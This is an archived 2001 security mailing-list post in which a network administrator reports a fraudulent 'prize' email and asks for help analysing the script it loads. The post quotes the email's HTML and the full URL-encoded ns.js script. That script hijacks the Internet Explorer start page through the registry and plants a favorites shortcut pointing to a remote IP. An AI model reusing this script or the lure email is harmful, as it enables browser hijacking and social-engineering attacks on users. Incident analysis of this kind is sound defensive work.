Security Incidents mailing list archives
RE: E-mail with ties to possible malicious website -MORE
From: "Michael B. Morell" <MMorell () vdat com>
Date: Thu, 8 Nov 2001 14:54:31 -0500
(-; A couple of days late ---| -----------------------------| Add info- I was able to get a good scan of the referenced "ns.js" file from nai, turns out to be js/seeker.gen. So it is basically a established virus. But it's delivery method is different. The one thing however that I would raise a concern about, is if the web site operator succeeded in creating the reg key that sets the default page to his site. They can then run code of their choice the next time someone launches their browser, be it IE or Netscape. Be it downloading a trojan or just simply crashing their machine. Turns out to be nothing major in the scheme of things. -----Original Message----- From: Michael B. Morell [mailto:MMorell () vdat com] Sent: Tuesday, November 06, 2001 12:15 PM To: incidents () securityfocus com Subject: E-mail with ties to possible malicious website A suspicious e-mail has been received by my network that I believe is worth opening up to the community for further scrutiny. I appreciate any further insight that anyone else might be able to shed. The e-mails have been submitted to sarc and nai for review. Sarc has already said that the ns.js is not a virus. Nai has yet to respond. An e-mail has also been sent to the host-master responsible for the mail server that was used to relay the e-mail. I have not yet sent an e-mail to the ISP of the referenced IP in the e-mail. I have looked into the e-mail extensively and have not been able to find any clear evidence of a destructive payload. However it is it's delivery method and what it appears to try to do that is cause for my concern. The e-mail itself is HTML based and relies on social engineering to coerce the end user into proceeding. <!--Begin HTML--> <html> <head> <title>Prize Collection</title> </head> <body bgcolor="#FFFFFF" text="#000000" onload=init();> <p>Dear Sir/Madam.</p> <p>I am contacting you on behalf of the "Online Bank Draw" corporation.<br> A prize won by you on the 16th of August 2001 (by e-mail submission) is ready to be collected.<br> <br> Please <a href="http://64.57.164.73/agus2000/ns/"; target="_blank">read this page for further information</a>.</p> <p><br> Yours Sincerely.<br> Mike Ranson.<br> USCT Internet Postal Delivery.<br> <script language="JScript.Encode" src="http://64.57.164.73/agus2000/ns.js";></script> </p> </body> </html> <!--End HTML--> You will notice some tell tale signs that this is a fraudelent e-mail. 1. The Lack of a subject 2. A claim of prize money 3. A odd name for a company "Online Bank Draw" 4. signed by the USCT Internet Postal Delivery (never heard of them) A further investigation into the headers will also reveal that the sender does not have a Valid E-mail address nor can you trace it's footprint back. <!--Begin Headers, obvious substitutions of names and Ips' until relayed mail server hostmaster confirms authorized use of server--) Received: from ADomain.com (mail.ADomain.com [xxx.xxx.xxx.xxx]) by mail.OurDomain.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id V93AVXYX; Mon, 5 Nov 2001 18:36:34 -0500 Received: from mail.ADomain.com [xxx.xxx.xxx.xxx] by ADomain.com with ESMTP (SMTPD32-6.06) id A27E9B6019E; Mon, 05 Nov 2001 18:36:30 -0500 From: Mike Ranson - USCT Internet Postal Delivery Date: Tue, 06 Nov 2001 07:34:13 To: ReplacedUserNameHere Subject: MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_NextPart_FPJUZAJHEK" Content-Transfer-Encoding: 7bit Message-ID: PM20007:34:13 AM This is an HTML email message. If you see this, your mail client does not support HTML messages. ------=_NextPart_FPJUZAJHEK Content-Type: text/html;charset="iso-8859-1" Content-Transfer-Encoding: 7bit ------=_NextPart_FPJUZAJHEK-- <!--End Headers--> Once a user clicks on the link in the e-mail. Their screen is flooded with opened windows that go to adult websites (aka porn). It was unsure whether or not this was to hide further action of the script or if that was the intended payload. After some searching on the infected system. I was unable to find any obvious system file changes/additions. But I was able to find the ns.js file that was referenced in the source. This was found in the temporary Internet files folder. By reading the script file I noticed several things (granted I am not the best at JavaScripting, which is why I am submitting it here). From what I can tell it checks to see if the clsid for netscape/IE/wsh exist and if they do attempt to write a reg key for the current user. The path it calls is based on the Win2k users path. <!--Begin ns.js opened in notepad--> <!-- document.write(unescape("%3Cscript%20language%3D%22JavaScript%22%3E%0D%0A%09 document.write%28%22%3CAPPLET%20HEIGHT%3D0%20WIDTH%3D0%20code%3Dcom.ms.activ eX.ActiveXComponent%3E%3C/APPLET%3E%22%29%3B%0D%0A%0D%0A%09if%20%28navigator .appName%20%3D%3D%20%27Netscape%27%29%20var%20language%20%3D%20navigator.lan guage%3B%0D%0A%09else%20var%20language%20%3D%20navigator.browserLanguage%3B% 0D%0A%0D%0A%09function%20AddFavLnk%28loc%2C%20DispName%2C%20SiteURL%29%20%7B %0D%0A%09%20%20var%20Shor%20%3D%20Shl.CreateShortcut%28loc%20+%20%22%5C%5C%2 2%20+%20DispName%20+%22.URL%22%29%3B%0D%0A%09%20%20Shor.TargetPath%20%3D%20S iteURL%3B%0D%0A%09%20%20Shor.Save%28%29%3B%0D%0A%09%7D%0D%0A%0D%0A%09functio n%20f%28%29%20%7B%0D%0A%09%20%20try%20%7B%0D%0A%20%20%20%20%20%20a1%3Ddocume nt.applets%5B0%5D%3B%0D%0A%20%20%20%20%20%20a1.setCLSID%28%22%7BF935DC22-1CF 0-11D0-ADB9-00C04FD58A0B%7D%22%29%3B%0D%0A%20%20%20%20%20%20a1.createInstanc e%28%29%3B%0D%0A%20%20%20%20%20%20Shl%20%3D%20a1.GetObject%28%29%3B%0D%0A%20 %20%20%20%20%20a1.setCLSID%28%22%7B0D43FE01-F093-11CF-8940-00A0C9054228%7D%2 2%29%3B%0D%0A%20%20%20%20%20%20a1.createInstance%28%29%3B%0D%0A%20%20%20%20% 20%20FSO%20%3D%20a1.GetObject%28%29%3B%0D%0A%20%20%20%20%20%20a1.setCLSID%28 %22%7BF935DC26-1CF0-11D0-ADB9-00C04FD58A0B%7D%22%29%3B%0D%0A%20%20%20%20%20% 20a1.createInstance%28%29%3B%0D%0A%20%20%20%20%20%20Net%20%3D%20a1.GetObject %28%29%3B%0D%0A%20%20%20%20%20%20try%20%7B%0D%0A//%20%20%20%20%20%20%20%20if %20%28document.cookie.indexOf%28%22Chg%22%29%20%3D%3D%20-1%29%20%7B%0D%0A//% 20%20%20%20%20%20%20%20%20%20var%20expdate%20%3D%20new%20Date%28%28new%20Dat e%28%29%29.getTime%28%29%20+%20%2824%20*%2060%20*%2060%20*%201000%20*%2090%2 9%29%3B%0D%0A//%20%20%20%20%20%20%20%20%20%20document.cookie%3D%22Chg%3Dgene ral%3B%20expires%3D%22%20+%20expdate.toGMTString%28%29%20+%20%22%3B%20path%3 D/%3B%22%0D%0A%20%20%20%20%20%20%20%20%20%20if%20%28%21language.indexOf%28%2 7es%27%29%20%3E-1%29%20Shl.RegWrite%20%28%22HKCU%5C%5CSoftware%5C%5CMicrosof t%5C%5CInternet%20Explorer%5C%5CMain%5C%5CStart%20Page%22%2C%20%22http%3A//6 4.57.164.73/agus2000/jstarter/%22%29%3B%0D%0A//%20%20%20%20%20%20%20%20%20%2 0var%20expdate%20%3D%20new%20Date%28%28new%20Date%28%29%29.getTime%28%29%20+ %20%2824%20*%2060%20*%2060%20*%201000%20*%2090%29%29%3B%0D%0A//%20%20%20%20% 20%20%20%20%20%20document.cookie%3D%22Chg%3Dgeneral%3B%20expires%3D%22%20+%2 0expdate.toGMTString%28%29%20+%20%22%3B%20path%3D/%3B%22%0D%0A%20%20%20%20%2 0%20%20%20%20%20var%20WF%2C%20Shor%2C%20loc%3B%0D%0A%20%20%20%20%20%20%20%20 %20%20WF%20%3D%20FSO.GetSpecialFolder%280%29%3B%0D%0A%20%20%20%20%20%20%20%2 0%20%20if%20%28language.indexOf%28%27es%27%29%20%3E-1%29%20loc%20%3D%20WF%20 +%20%22%5C%5Cfavoritos%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20 %28language.indexOf%28%27de%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5 Cfavoriten%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20%28language. indexOf%28%27sv%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cfavoriter%2 2%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%2 7it%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cpreferiti%22%3B%0D%0A%2 0%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27fr%27%29%20 %3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cfavoris%22%3B%0D%0A%20%20%20%20%20% 20%20%20%20%20else%20if%20%28language.indexOf%28%27da%27%29%20%3E-1%29%20loc %20%3D%20WF%20+%20%22%5C%5Coversigt%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%2 0else%20loc%20%3D%20WF%20+%20%22%5C%5CFavorites%22%3B%0D%0A%20%20%20%20%20%2 0%20%20%20%20if%28%21FSO.FolderExists%28loc%29%29%20%7B%0D%0A%20%20%20%20%20 %20%20%20%20%20%20%20if%20%28language.indexOf%28%27es%27%29%20%3E-1%29%20loc %20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%20Settings% 5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5CFavoritos%22%3B%0D%0A%20%20%20%20 %20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27de%27%29%20%3E- 1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%2 0Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cfavoriten%22%3B%0D%0A%2 0%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27sv%27 %29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocumen ts%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cfavoriter%22% 3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf% 28%27it%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C %5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cpre feriti%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28languag e.indexOf%28%27fr%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20 +%20%22%5C%5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%2 2%5C%5Cfavoris%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%2 8language.indexOf%28%27da%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28 WF%29%20+%20%22%5C%5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName% 20+%20%22%5C%5Coversigt%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else% 20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%20Sett ings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5CFavorites%22%3B%0D%0A%20%20% 20%20%20%20%20%20%20%20%20%20if%28%21FSO.FolderExists%28loc%29%29%20%7B%0D%0 A%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%0D%0A%20%20%20%20%20%20 %20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20% 20%20%20%20%20%20%20AddFavLnk%28loc%2C%20%22START HERE%22%2C%20%22http%3A//64.57.164.73/agus2000/jstarter/%22%29%3B%0D%0A//%20 %20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20c atch%28e%29%20%7B%7D%0D%0A%09%20%20%7D%0D%0A%09%20%20catch%28e%29%20%7B%7D%0 D%0A%09%7D%0D%0A%0D%0A%09function%20init%28%29%20%7B%0D%0A%09%20%20setTimeou t%28%22f%28%29%22%2C%201000%29%3B%0D%0A%09%7D%0D%0A%0D%0A%09init%28%29%3B%0D %0A%3C/script%3E%0D%0A")); //--> <!--End ns.js--> One of my main reasons of concern is that if it is able to get the start page changed for the browser, changed to a malicious location. It would then be possible upon start up of the browser for the malicious website operator to download code of his/her choice to the system. The attempt is to write a reg key in HKCU\Software\Microsoft\InternetExplorer\MainStartPage and to set it to http//64.57.164.73/agus2000/jstarter Another concern is the reference to the FSO.GetDriveName. I am unsure if it is referencing the File System Object for any drive mappings that the system has present. If this can be confirmed/dismissed it would be helpful. Plus the mention of setting a cookie on the system and it's setting an expiration date. Thanks in advance for looking at this. Michael B. Morell Network Operations Administrator Visual Data Corporation ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- RE: E-mail with ties to possible malicious website -MORE Michael B. Morell (Nov 08)